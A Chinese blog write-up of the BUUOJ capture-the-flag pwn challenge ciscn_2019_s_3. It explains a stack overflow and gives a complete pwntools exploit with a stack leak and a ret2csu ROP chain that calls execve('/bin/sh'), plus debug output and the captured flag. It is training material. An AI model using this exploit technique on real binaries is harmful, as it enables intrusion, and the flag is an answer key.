CTF buuoj pwn-----第12题: ciscn_2019_s_3

最新推荐文章于 2024-07-11 16:45:57 发布
最新推荐文章于 2024-07-11 16:45:57 发布
阅读量1.7k 收藏 3
点赞数
分类专栏: PWN 文章标签: 安全 linux pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bing_Max/article/details/120674096
版权

CTF buuoj pwn-----第12题: ciscn_2019_s_3

1. 查看基本信息

  • file:
bing@bing-virtual-machine:~$ file ./ciscn_s_3
./ciscn_s_3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, 
BuildID[sha1]=af580816080db5e4d1d93a271087adaee29028e8, not stripped
  • checksec:
bing@bing-virtual-machine:~$ checksec ./ciscn_s_3
[*] '/home/bing/ciscn_s_3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

2. 函数分析

  • main函数啥也没有,
  • vuln函数:两个系统调用函数,buf只有16大小,栈溢出
  • read(),write()的 原型:
    • read():ssizet read(int fd,const void *buf,sizet nbytes); //fd 为要读取的文件的描述符 0//buf 为要读取的数据的缓冲区地址//nbytes 为要读取的数据的字节数 read() 函数会从 fd
      文件中读取 nbytes 个字节并保存到缓冲区 buf,//成功则返回读取到的字节数(但遇到文件结尾则返回0),失败则返回 -1。
    • write()ssizet write(int fd,const void *buf,sizet nbytes); //fd 为要写入的文件的描述符 1//buf 为要写入的数据的缓冲区地址//nbytes 为要写入的数据的字节数 write() 函数会将缓冲区
      buf 中的 nbytes 个字节写入文件 fd,//成功则返回写入的字节数,失败则返回 -1。

在这里插入图片描述

  • 值得注意的是,vuln的汇编代码为:没有sub rsp ;没有leave
    在这里插入图片描述

  • gadget函数:
    mov rax, 3Bh ; 系统调用号3b(59),execve(‘bin/sh’, 0, 0)
    在这里插入图片描述

3. 编写exp

  • payload_1 = b’/bin/sh\x00’ + b’a’*0x8 + p64(main_addr)

    vuln的汇编代码中:
    .text:0000000000400517 系统调用之后,
    .text:0000000000400519 就是retn ,没有leave,而且.text:00000000004004EE 后面也没有sub rsp,所有一直有rsp==rbp,所以:
    构造payload_1时, payload_1=b’/bin/sh\x00’ + b’a’*0x8 + p64(main_addr),16个字符后面直接就是 返回地址 main_addr),这里的 b’a’*0x8 不是往常的rbp地址,还是合法的栈上空间。

  • payload_2的栈帧分析:
    在这里插入图片描述

from pwn import *

sh = remote('node4.buuoj.cn', 27939)
context(arch='amd64',os='linux', log_level='debug')

main_addr= 0x4004ED    # 这里其实是vuln的地址,  main地址会错:timeout: the monitored command dumped core  
payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p64(main_addr)

sh.sendline(payload_1)
sh.recv(0x20)
stack_addr = u64(sh.recv(8))
bin_sh_addr = stack_addr - 0x118   # 本地gdb调试的时候是0x128,但是远程必须0x118才能打通。??
print(hex(bin_sh_addr))


execv_addr = 0x04004E2      # gadgets函数: mov rax, 59  系统调用号59  作用是给syscall一个参数rax=59
mov_rdx_r13 = 0x400580     # _libc_csu_init() 函数通用的指令
pop_rbx_rbp_r12_r13_r14_r15_addr = 0x40059A   # _libc_csu_init() 函数通用的指令
pop_rdi_addr=0x4005a3    # pop rdi  ROPgadget得到的
syscall_addr = 0x400517   # 这里是调用syscall (read)指令的地址;也可以用syscall(write)的地址:0x400517


payload_2 = b'/bin/sh\x00' + b'a'*8 + p64(pop_rbx_rbp_r12_r13_r14_r15_addr) + p64(0)*2 + p64(bin_sh_addr+0x50) +p64(0)*3+ p64(mov_rdx_r13)+p64(execv_addr)+p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(syscall_addr)


sh.sendline(payload_2)
sh.interactive()

4. 运行exp,获取flag

bing@bing-virtual-machine:~$ python3 ./ciscn_s_3.py 
[+] Opening connection to node4.buuoj.cn on port 27939: Done
[DEBUG] Sent 0x19 bytes:
    00000000  2f 62 69 6e  2f 73 68 00  61 61 61 61  61 61 61 61/bin/sh·│aaaa│aaaa│
    00000010  ed 04 40 00  00 00 00 00  0a                        │··@·│····│·│
    00000019
[DEBUG] Received 0x30 bytes:
    00000000  2f 62 69 6e  2f 73 68 00  61 61 61 61  61 61 61 61/bin/sh·│aaaa│aaaa│
    00000010  ed 04 40 00  00 00 00 00  0a 05 40 00  00 00 00 00  │··@·│····│··@·│····│
    00000020  48 05 81 00  fd 7f 00 00  00 00 00 00  01 00 00 00  │H···│····│····│····│
    00000030
0x7ffd00810430
[DEBUG] Sent 0x71 bytes:
    00000000  2f 62 69 6e  2f 73 68 00  61 61 61 61  61 61 61 61/bin/sh·│aaaa│aaaa│
    00000010  9a 05 40 00  00 00 00 00  00 00 00 00  00 00 00 00  │··@·│····│····│····│
    00000020  00 00 00 00  00 00 00 00  80 04 81 00  fd 7f 00 00  │····│····│····│····│
    00000030  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    00000040  00 00 00 00  00 00 00 00  80 05 40 00  00 00 00 00  │····│····│··@·│····│
    00000050  e2 04 40 00  00 00 00 00  a3 05 40 00  00 00 00 00  │··@·│····│··@·│····│
    00000060  30 04 81 00  fd 7f 00 00  17 05 40 00  00 00 00 000···│····│··@·│····│
    00000070  0a                                                  │·│
    00000071
[*] Switching to interactive mode
\x00\x00\x00\x00[DEBUG] Received 0x30 bytes:
    00000000  2f 62 69 6e  2f 73 68 00  61 61 61 61  61 61 61 61/bin/sh·│aaaa│aaaa│
    00000010  9a 05 40 00  00 00 00 00  00 00 00 00  00 00 00 00  │··@·│····│····│····│
    00000020  00 00 00 00  00 00 00 00  80 04 81 00  fd 7f 00 00  │····│····│····│····│
    00000030
/bin/sh\x00aaaaaaa\x9a\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x7f\x00
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2b bytes:
    b'flag{6acec18c-2ec1-4082-bb18-4f1db3d7b30b}\n'
flag{6acec18c-2ec1-4082-bb18-4f1db3d7b30b}

flag{6acec18c-2ec1-4082-bb18-4f1db3d7b30b}

小结

  • syscall
    在这里插入图片描述

    • 传参方式:
      • 32位:传参方式:首先将系统调用号 传入 eax,然后将参数 从左到右 依次存入 ebx,ecx,edx寄存器中,返回值存在eax寄存器调用号: sysread 的调用号 为 3 syswrite 的调用号 为 4 。调用方式: 使用 int 80h 中断进行系统调用
      • 64位:传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器调用号:sysread 的调用号 为 0 syswrite 的调用号 为 1 stubexecve 的调用号 为 59 stubrt_sigreturn 的调用号 为 15。调用方式: 使用 syscall 进行系统调用

  • 本题目依然有疑惑,payload_2 = b’/bin/sh\x00’ + b’a’*8 + p64(pop_rbx_rbp_r12_r13_r14_r15_addr) + p64(0)*2 + p64(bin_sh_addr+0x50)

    • bin_sh_addr+0x50 这里为什么要加0x50????
    • bin_sh_addr = stack_addr - 0x118 # 本地gdb调试的时候是0x128,但是远程必须0x118才能打通。
pwnciscn_2019_s_3
Nothing
12-14 4741
是全国大学生信息安全竞赛的一道线下半决赛目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
buuctf:ciscn_s_3
xia0ji233
05-27 817
title: 系统调用的学习 date: 2021-05-25 22:00:00 tags: binary security study report syscall comments: true categories: ctf pwn today新的知识又增长了,发现了getshell的另一种方式:syscall和srop。故事还要源于…(此处省略万字输出) (note:本作者这次有点懒,没有写AT&T汇编,而是一律用了intel汇编,请悉知) 可能是之前汇编基础不太好吧,竟没有发现sy.
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1451
对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 601
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
BUUCTF ciscn_2019_s_3
最新发布
zwb2603096342的博客
07-11 1449
ret2csu,gdb查找stack,srop的利用
【BUUCTF - PWNciscn_2019_s_3
古月浪子的博客
04-17 829
checksec一下,栈溢出 IDA打开看看,main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...
BUUOJ PWN 61-80
2h4ox1n9
12-17 332
61\
BUUCTF PWN-总结 2021-09-27
m0_56897090的博客
09-27 2376
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
CTF解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1523
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
BUUCTF-PWN记录-5(Tcache)
weixin_44145820的博客
04-13 1579
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
ciscn_2019_s_3
qq_45691294的博客
12-29 2291
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
[BUUCTF-pwn]——ciscn_2019_s_3
Y_peak的博客
02-13 438
[BUUCTF-pwn]——ciscn_2019_s_3 目地址:https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识 写这道之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存
csicn_2019_s_3
Morphy_Amo的博客
03-06 428
万能gadget、SROP
2019ciscn_s_3
Hyrink的博客
06-07 607
ciscn_s_3的两种解法:SROP & ret2csu详解
pwn ciscn_2019_s_3
beaster1的博客
03-23 255
pwn ciscn_2019_s_3(srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
ciscn_2019_s_3(系统调用综合)
weixin_61283545的博客
06-11 912
打开函数只有read和write。发现gadget函数,这道重要关键在于系统调用号。发现gadget rax赋值为59,调用execve,ida H键变10进制,调用execve需要$rax==59$rdi==“/bin/sh”$rsi==0$rdx==0syscall这时候就需要用到libc_csu辅助,ropper里面可以找到pop rdi,/bin/sh\x00我们可以直接通过read写入栈中,其他的利用gadget进行填充。 注意的是read后面没有leave不用填充。还有一点在执行csu_e
axis-1_4:实用自动生成功能,探索新境界
CTF是一种信息安全竞赛,通常包含一系列的挑战目,每都关联着一些对特定技能的测试,比如密码分析、二进制分析、Web应用安全、逆向工程、网络取证等。尽管CTF竞赛通常不直接关联到Axis工具,但是在这里“类似于...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值